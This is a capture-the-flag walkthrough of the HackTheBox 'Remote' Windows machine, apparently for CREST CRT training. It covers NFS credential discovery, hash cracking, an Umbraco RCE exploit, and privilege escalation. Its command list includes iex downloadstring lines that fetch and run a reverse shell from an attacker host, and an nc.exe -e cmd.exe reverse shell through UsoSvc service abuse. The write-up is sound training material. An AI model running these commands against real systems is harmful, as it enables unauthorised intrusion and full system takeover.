We covered HackTheBox Remote machine as part of CREST CRT (Registered Penetration Tester) Track. We demonstrated Umbraco CMS exploitation and more than one path to escalate privileges on Windows.
Remote is an easy difficulty Windows machine that features an Umbraco CMS installation. Credentials are found in a world-readable NFS share. Using these, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password. This password has been reused with the local administrator account. Using `psexec` with these credentials returns a SYSTEM shell.
Initial Enumeration
I started with an Nmap scan, which revealed open ports, including Port 80 (HTTP), Port 2049 (NFS), and SMB ports (445, 135, 139). I decided to begin by examining the web server.
Web Server Enumeration
I identified the website as using the Umbraco Content Management System (CMS). The administration panel is typically found at the /umbraco
directory. A search for exploits revealed an authenticated remote code execution vulnerability for Umbraco.
NFS Enumeration and Credential Discovery
I used the showmount -e [IP_ADDRESS]
command to list NFS shares. I found an open share named site_backups
with “everyone” permissions. I mounted the share locally using mount -t nfs [IP_ADDRESS]:/site_backups /mnt/
.
Inside the mounted share, I found a file named Umbraco.sdf
in the updater
directory, which is a standard database format file. I used the strings Umbraco.sdf | less
command to extract readable information from the database file. This revealed usernames and password hashes, and I focused on the hash for admin@htb.local
.
Password Cracking
I used Hashcat to crack the SHA1 hash with hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force
. This process takes time, so I didn’t run it live but noted the command.
Exploitation
I then used a Python exploit script for Umbraco. The command to run the exploit was: python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"
. This command downloads and executes a PowerShell reverse shell (shell.ps1
) from my attacker’s machine.
I started a Python HTTP server on my machine to serve the shell.ps1
file using python3 -m http.server [PORT]
. I also set up a Netcat listener on my machine to receive the reverse shell with nc -lvp 4545
. I modified the shell.ps1
script to connect back to my IP and port 4545.
Post-Exploitation – Initial Foothold
Once the reverse shell was caught, I ran systeminfo
to gather system details and whoami
to identify the current user, which was iis apppool\defaultapppool
. I also used whoami /priv
to check user privileges.
Privilege Escalation
I used the PowerUp PowerShell script for privilege escalation enumeration. I downloaded the script to the victim machine (e.g., into c:\users\public
) using iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')
or (New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')
.
I then executed PowerUp by importing its functions (. .\powerup.ps1
) and running Invoke-AllChecks
. PowerUp identified two potential privilege escalation vectors: Juicy Potato (due to SeImpersonatePrivilege
) and Service Abuse (UsoSvc). I skipped Juicy Potato as it’s a common technique.
PowerUp suggested Invoke-ServiceAbuse -Name UsoSvc
. Running this command by default creates a new user and adds them to the administrators group, but this user might not be able to log in via WinRM.
I opted for a modified service abuse to get a direct administrator shell. I downloaded Netcat (nc.exe
) to the victim machine (e.g., c:\users\public
). I started a new Netcat listener on my attacker’s machine: nc -lvp 4547
. Then, I used the Invoke-ServiceAbuse
command with a custom command to connect back: Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"
. This resulted in a shell as nt authority\system
, which I confirmed with whoami
.
Other Mentioned Methods (Not Demonstrated in Detail)
I also briefly considered using Metasploit, but encountered issues with shells dying immediately. I attempted to log in with the user created by PowerUp’s default service abuse using Evil-WinRM (evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]
), but it failed due to authorization issues.
Technical Commands Used
Here are the technical commands I used:
nmap
(for initial scanning)showmount -e [IP_ADDRESS]
mount -t nfs [IP_ADDRESS]:/site_backups /mnt/
strings Umbraco.sdf | less
hashcat -m 100 [HASH_FILE] [WORDLIST_PATH] --force
python exploit.py -u admin@htb.local -p [CRACKED_PASSWORD] -i http://[IP_ADDRESS]/ -c "powershell -c iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/shell.ps1')"
python3 -m http.server [PORT]
nc -lvp 4545
systeminfo
whoami
whoami /priv
iex(new-object net.webclient).downloadstring('http://[ATTACKER_IP]:[PORT]/powerup.ps1')
(New-Object Net.WebClient).DownloadFile('http://[ATTACKER_IP]/powerup.ps1', 'C:\path\to\powerup.ps1')
. .\powerup.ps1
Invoke-AllChecks
nc -lvp 4547
Invoke-ServiceAbuse -Name UsoSvc -Command "C:\users\public\nc.exe [ATTACKER_IP] 4547 -e cmd.exe"
evil-winrm -i [VICTIM_IP] -u John -p [PASSWORD]